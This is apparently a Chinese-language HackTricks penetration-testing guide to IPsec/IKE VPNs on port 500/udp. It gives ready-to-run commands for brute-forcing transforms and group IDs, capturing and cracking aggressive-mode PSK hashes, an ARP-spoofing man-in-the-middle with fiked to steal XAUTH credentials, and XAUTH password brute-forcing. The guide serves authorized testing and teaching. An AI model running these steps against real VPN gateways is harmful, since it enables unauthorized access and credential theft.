17 KiB
500/udp - IPsec/IKE VPN 渗透测试
☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家网络安全公司工作吗?想要在 HackTricks 上宣传你的公司吗?或者你想要获取最新版本的 PEASS 或下载 PDF 格式的 HackTricks?请查看订阅计划!
- 发现我们的独家NFTs收藏品——The PEASS Family
- 获取官方 PEASS & HackTricks 商品
- 加入💬 Discord 群组 或 telegram 群组,或者关注我在Twitter上的🐦@carlospolopm。
- 通过向hacktricks 仓库 和hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。
找到最重要的漏洞,以便更快地修复它们。Intruder 跟踪你的攻击面,运行主动威胁扫描,发现整个技术栈中的问题,从 API 到 Web 应用和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
基本信息
IPsec 是用于网关到网关(LAN 到 LAN)和主机到网关(远程访问)企业 VPN 解决方案的最常用技术。
IKE 是 ISAKMP 的一种类型(Internet Security Association Key Management Protocol)实现,它是一种用于身份验证和密钥交换的框架。IKE 通过三个阶段的过程在两个端点之间建立安全关联(SA):
- 第 1 阶段:使用预共享密钥(PSK)或证书在 2 个端点之间建立安全通道。它可以使用主模式(3 对消息)或主动模式。
- **第 1.5 阶段:**这是可选的,称为扩展认证阶段,用于对尝试连接的用户进行身份验证(用户+密码)。
- **第 2 阶段:**使用 ESP 和 AH 协商数据安全的参数。它可以使用与第 1 阶段不同的算法(完全前向保密(PFS))。
**默认端口:**500/udp
使用 nmap 发现服务
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
寻找有效的转换
IPSec配置只能准备接受一个或几个转换。一个转换是一组值的组合。每个转换包含一些属性,如DES或3DES作为加密算法,SHA或MD5作为完整性算法,预共享密钥作为身份验证类型,Diffie-Hellman 1或2作为密钥分发算法,以及28800秒作为生命周期。
因此,你首先要做的是找到一个有效的转换,这样服务器才会与你通信。为此,你可以使用工具ike-scan。默认情况下,ike-scan在主模式下工作,并向网关发送一个带有ISAKMP头和一个包含八个转换的提议的数据包。
根据响应,你可以获取有关终端的一些信息:
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
正如您在上一条回复中所看到的,有一个名为AUTH的字段,其值为PSK。这意味着VPN是使用预共享密钥进行配置的(对于渗透测试人员来说,这非常好)。 最后一行的值也非常重要:
- 返回0个握手;返回0个通知: 这意味着目标不是一个IPsec网关。
- 返回1个握手;返回0个通知: 这意味着目标已配置为IPsec,并愿意执行IKE协商,并且您提出的一个或多个变换是可接受的(输出中将显示一个有效的变换)。
- 返回0个握手;返回1个通知: 当没有一个变换是可接受的时,VPN网关会响应一个通知消息(尽管一些网关不会这样做,在这种情况下,应尝试进一步分析和修改提议)。
因此,在这种情况下,我们已经有了一个有效的变换,但如果您处于第三种情况,则需要稍微进行暴力破解以找到一个有效的变换:
首先,您需要创建所有可能的变换:
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
然后使用ike-scan对每个进行暴力破解(这可能需要几分钟):
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
如果暴力破解没有成功,可能服务器即使对有效的转换也没有进行握手响应。那么,你可以尝试使用侵略模式进行相同的暴力破解:
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
希望有效的转换被回显。
您可以尝试使用iker.py进行相同的攻击。
您还可以尝试使用ikeforce来暴力破解转换:
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
在DH Group: 14 = 2048-bit MODP和15 = 3072-bit中
2 = HMAC-SHA = SHA1(在这种情况下)。--trans格式为$Enc,$Hash,$Auth,$DH
Cisco建议特别避免使用DH组1和2。论文的作者描述了如何通过离散对数预计算来解密使用弱组协商的IPsec会话,这很可能是国家可以做到的。通过实时解密使用弱组(1,024位或更小)的任何会话,数亿美元的预计算成本得到了摊销。
服务器指纹识别
然后,您可以使用ike-scan尝试发现设备的供应商。该工具发送一个初始提议并停止重放。然后,它将分析从服务器接收到的消息与匹配的响应模式之间的时间差异,渗透测试人员可以成功识别VPN网关供应商。此外,一些VPN服务器将使用带有IKE的可选供应商ID(VID)负载。
如果需要,指定有效的转换(使用--trans)
如果IKE发现供应商是谁,它将打印出来:
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
这也可以使用nmap脚本_ike-version_来实现。
查找正确的ID(组名)
为了能够捕获哈希值,您需要一个支持主动模式和正确ID(组名)的有效转换。您可能不知道有效的组名,因此您需要进行暴力破解。
为此,我建议您使用2种方法:
使用ike-scan进行ID暴力破解
首先,尝试使用虚假的ID发出请求,尝试收集哈希值("-P"):
ike-scan -P -M -A -n fakeID <IP>
如果没有返回哈希值,那么可能这种暴力破解方法会起作用。如果返回了某个哈希值,这意味着将返回一个伪造的哈希值用于伪造的ID,因此这种方法不可靠来暴力破解ID。例如,可能会返回一个伪造的哈希值(在现代版本中会发生这种情况):
但是,如果如我所说,没有返回哈希值,那么你应该尝试使用ike-scan来暴力破解常见的组名。
这个脚本将尝试暴力破解可能的ID,并返回返回有效握手的ID(这将是一个有效的组名)。
如果你发现了特定的转换,请在ike-scan命令中添加它。如果你发现了多个转换,请随意添加一个新的循环来尝试它们(你应该尝试它们所有,直到其中一个正常工作为止)。
你可以使用ikeforce的字典或seclists中的字典来暴力破解常见的组名:
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
或者使用这个字典(是两个字典的组合,没有重复的内容):
{% file src="../.gitbook/assets/vpnIDs.txt" %}
使用Iker进行ID暴力破解
iker.py 也使用 ike-scan 来暴力破解可能的组名。它遵循自己的方法,根据ike-scan的输出来找到一个有效的ID。
使用ikeforce进行ID暴力破解
ikeforce.py 是一个可以用来暴力破解ID的工具。该工具将尝试利用不同的漏洞来区分有效ID和非有效ID(可能会有误报和误判,这就是为什么我更喜欢使用ike-scan方法)。
默认情况下,ikeforce会在开始时发送一些随机的ID来检查服务器的行为,并确定要使用的策略。
- 第一种方法是通过搜索Cisco系统的Dead Peer Detection DPD信息(只有在组名正确时服务器才会回复该信息)来暴力破解组名。
- 第二种可用的方法是检查每次尝试发送的响应数量,因为有时在使用正确的ID时会发送更多的数据包。
- 第三种方法是在对不正确的ID进行响应时搜索"INVALID-ID-INFORMATION"。
- 最后,如果服务器对检查没有任何回复,ikeforce将尝试暴力破解服务器,并检查当发送正确的ID时服务器是否会回复一些数据包。
显然,暴力破解ID的目标是在获得有效的ID后获取PSK。然后,使用ID和PSK将需要暴力破解XAUTH(如果启用)。
如果您发现了特定的转换,请将其添加到ikeforce命令中。如果您发现了多个转换,请随意添加一个新的循环来尝试它们(您应该尝试它们所有,直到其中一个正常工作为止)。
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
嗅探ID
通过嗅探VPN客户端和服务器之间的连接,也可以获取有效的用户名,因为第一个激进模式数据包中包含的客户端ID是明文发送的(来自书籍《网络安全评估:了解您的网络》)。
捕获和破解哈希值
最后,如果您找到了一个有效的转换和组名,并且允许激进模式,那么您可以非常容易地获取可破解的哈希值:
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
哈希值将保存在 hash.txt 文件中。
您可以使用 psk-crack、john(使用 ikescan2john.py)和 hashcat 来 破解该哈希值:
psk-crack -d <Wordlist_path> psk.txt
XAuth
大多数实现使用预共享密钥的主动模式IKE进行组认证,并使用XAUTH提供额外的用户认证(通过Microsoft Active Directory、RADIUS或类似方式)。在IKEv2中,EAP替代XAUTH用于认证用户。
本地网络中间人攻击以捕获凭据
因此,您可以使用_fiked_捕获登录数据,并查看是否存在默认用户名(您需要将IKE流量重定向到fiked以进行嗅探,可以借助ARP欺骗来完成,更多信息)。Fiked将充当VPN终端点,并捕获XAuth凭据:
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
此外,使用IPSec尝试进行中间人攻击,并阻止所有流量到端口500,如果无法建立IPSec隧道,可能会以明文形式发送流量。
使用ikeforce暴力破解XAUTH用户名和密码
要暴力破解XAUTH(当您知道有效的组名id和psk时),您可以使用用户名或用户名列表以及密码列表:
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
这样,ikeforce将尝试使用每个用户名:密码组合进行连接。
如果找到一个或多个有效的转换方式,就像之前的步骤一样使用它们。
使用IPSEC VPN进行身份验证
在Kali中,使用VPNC建立IPsec隧道。配置文件必须位于_/etc/vpnc/中,您可以使用工具vpnc_来调用它们。
以下示例摘自书籍Network Security Assessment 3rd Edition:
root@kali:~# cat > /etc/vpnc/vpntest.conf << STOP
IPSec gateway 10.0.0.250
IPSec ID vpntest
IPSec secret groupsecret123
IKE Authmode psk
Xauth username chris
Xauth password tiffers1
STOP
root@kali:~# vpnc vpntest
VPNC started in background (pid: 6980)...
root@kali:~# ifconfig tun0
参考资料
Shodan
port:500 IKE
找到最重要的漏洞,以便更快地修复它们。Intruder跟踪您的攻击面,运行主动威胁扫描,发现整个技术堆栈中的问题,从API到Web应用程序和云系统。立即免费试用。
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 您在网络安全公司工作吗?您想在HackTricks中看到您的公司广告吗?或者您想获得最新版本的PEASS或下载PDF格式的HackTricks吗?请查看订阅计划!
- 发现我们的独家NFT收藏品The PEASS Family
- 获取官方PEASS和HackTricks周边产品
- 加入💬 Discord群组或电报群组或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks repo 和hacktricks-cloud repo 提交PR来分享您的黑客技巧。